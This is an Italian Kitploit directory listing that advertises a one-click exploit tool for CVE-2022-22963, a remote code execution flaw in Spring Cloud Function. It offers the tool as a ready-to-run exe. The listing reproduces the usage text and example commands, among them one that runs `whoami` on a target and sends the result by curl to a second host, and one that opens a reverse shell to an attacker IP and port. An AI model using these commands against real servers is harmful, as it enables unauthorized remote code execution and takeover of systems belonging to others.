Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-22963 — Strumento di sfruttamento con un clic per Spring Cloud Function! di charis blog https://charis3306.top/ | Kitploit
Strumenti/GitHubGitHub/charis3306/cve-2022-22963
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubcharis3306/cve-2022-22963

CVE-2022-22963

Strumento di sfruttamento con un clic per Spring Cloud Function! di charis blog https://charis3306.top/

Vedi Repository
833 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-22963 (spring cloud function sple rce)

Strumento di sfruttamento one-click per spring cloud function! by charis

Blog https://charis3306.top/

Già impacchettato come file exe, pronto all'uso

Argomento: comandi

usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

options:
  -h, --help         show this help message and exit
  --check CHECK      检测方式post或get方式,--check get --check post
  --route ROUTE      检测路由,默认是functionRouter
  --url URL          输入利用的url
  --ip IP            反弹shell地址ip
  --port PORT        反弹shell地址端口
  --proxies PROXIES  启用代理
  --cmd CMD          要执行的命令

--check è un'opzione obbligatoria

Argomento: aiuto

Spring-cloud-function-spel0.2.exe --help

image

Per il rilevamento predefinito, --check è obbligatorio; --route è la rotta in cui è presente la vulnerabilità. Nota: se non si effettua il rilevamento tramite dnslog o sleep, potrebbero esserci falsi positivi!

Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top

image

Eseguire un comando per verificare se è sfruttabile
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --cmd "curl http://192.168.1.3:8080/`whoami`"

image

Reverse shell
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --ip 192.168.1.3 --port 9999

image

Se ti è piaciuto, dammi una stella

Segnalazioni di problemi: Issues o contattami via email [email protected]

Scarica lo strumento